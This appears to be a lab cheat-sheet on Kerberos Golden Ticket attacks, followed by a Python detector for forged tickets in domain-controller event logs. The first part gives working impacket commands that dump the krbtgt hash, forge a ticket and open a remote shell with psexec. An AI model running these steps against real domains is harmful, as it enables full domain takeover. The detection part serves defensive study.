Golden Ticket
Using mimikatz
Using impacket tools
Extract the krbtgt NTLM hash
secretsdump.py Administrator:<PASSWORD>@10.10.100.200
[...]
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5508500012cc005cf7082a9a89ebdfdf:::
[...]
Extract SID of Domain
lookupsid.py CONTROLLER.local/Administrator:<PASSWORD>@10.10.100.200
[...]
[*] Domain SID is: S-1-5-21-849420856-2351964222-986696166
[...]
Generating Golden Ticket
Using the krbtgt NTLM hash, the Domain SID, the Domain Name and a
ticketer.py -nthash "5508500012cc005cf7082a9a89ebdfdf" -domain-sid "S-1-5-21-849420856-2351964222-986696166" -domain "CONTROLLER.local" NonExistentUserBla
Using ticket
export KRB5CCNAME=$(pwd)/Administrator.ccache
psexec.py CONTROLLER.local/Administrator@10.10.100.212 -k -no-pass
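A forged TGT of the kind produced above is minted offline with the krbtgt key, so the domain controller never logs a TGT request (event 4768) for it; only the later service-ticket requests (4769) appear, here for an account name that does not exist in the directory, and, because only the NT hash was supplied to ticketer.py, with an RC4 (0x17) ticket. The following detector is an added example and is not part of the original page or of impacket: it runs three such checks over constructed, simplified key=value renderings of DC security events (the field names TargetUserName, ServiceName, IpAddress and TicketEncryptionType are the Windows ones; the one-line format and the KNOWN_ACCOUNTS set are this example's own assumptions).

```python
"""
Added example: flag Kerberos service-ticket requests that show the traces
a forged TGT leaves on a domain controller.  Event lines are constructed
for this example and rendered as space-separated key=value pairs; a real
deployment would feed it parsed Security-log events instead.
"""

# Constructed sample events from one DC.  The first two are a normal logon:
# a TGT is issued (4768) and then a service ticket for cifs (4769).
# The last two come from the forged ticket: no 4768 was ever logged for the
# account, the account is not in the directory, and the ticket is RC4.
SAMPLE_EVENTS = [
    "EventID=4768 TargetUserName=Administrator IpAddress=10.10.100.50 TicketEncryptionType=0x12",
    "EventID=4769 TargetUserName=Administrator ServiceName=cifs/SRV01 IpAddress=10.10.100.50 TicketEncryptionType=0x12",
    "EventID=4769 TargetUserName=NonExistentUserBla ServiceName=cifs/SRV02 IpAddress=10.10.100.77 TicketEncryptionType=0x17",
    "EventID=4769 TargetUserName=NonExistentUserBla ServiceName=host/SRV02 IpAddress=10.10.100.77 TicketEncryptionType=0x17",
]

# Constructed list of accounts that exist in the directory (in practice an
# export of sAMAccountName values, compared case-insensitively).
KNOWN_ACCOUNTS = {"administrator", "svc_backup", "jdoe"}


def parse_event(line):
    """Turn one key=value event line into a dict of string fields."""
    return dict(tok.split("=", 1) for tok in line.split())


def detect_forged_tgt(events, known_accounts, aes_only=True):
    """Return {account: sorted reasons} for 4769 events that look forged.

    Heuristics (each is weak alone; they are meant to be combined):
      tgs_without_tgt          - a 4769 for an account this DC never issued a TGT to (no 4768)
      unknown_account          - the account name is not in the directory
      rc4_ticket_in_aes_domain - 0x17 ticket although the domain only issues AES tickets
    """
    parsed = [parse_event(line) for line in events]

    # Accounts for which this DC actually issued a TGT.
    tgt_seen = {ev["TargetUserName"].lower() for ev in parsed if ev["EventID"] == "4768"}

    findings = {}
    for ev in parsed:
        if ev["EventID"] != "4769":
            continue
        user = ev["TargetUserName"].lower()
        reasons = set()
        if user not in tgt_seen:
            reasons.add("tgs_without_tgt")
        if user not in known_accounts:
            reasons.add("unknown_account")
        if aes_only and ev.get("TicketEncryptionType") == "0x17":
            reasons.add("rc4_ticket_in_aes_domain")
        if reasons:
            findings.setdefault(user, set()).update(reasons)
    return {user: sorted(reasons) for user, reasons in findings.items()}


if __name__ == "__main__":
    for user, reasons in detect_forged_tgt(SAMPLE_EVENTS, KNOWN_ACCOUNTS).items():
        print(f"{user}: {', '.join(reasons)}")
```

The tgs_without_tgt check only holds when the events of every DC in the domain are correlated, since a legitimate TGT may have been issued by a different DC than the one answering the service-ticket request; the unknown_account check is the one that catches the NonExistentUserBla case directly, and a forged ticket that reuses a real account name will only trip the other two.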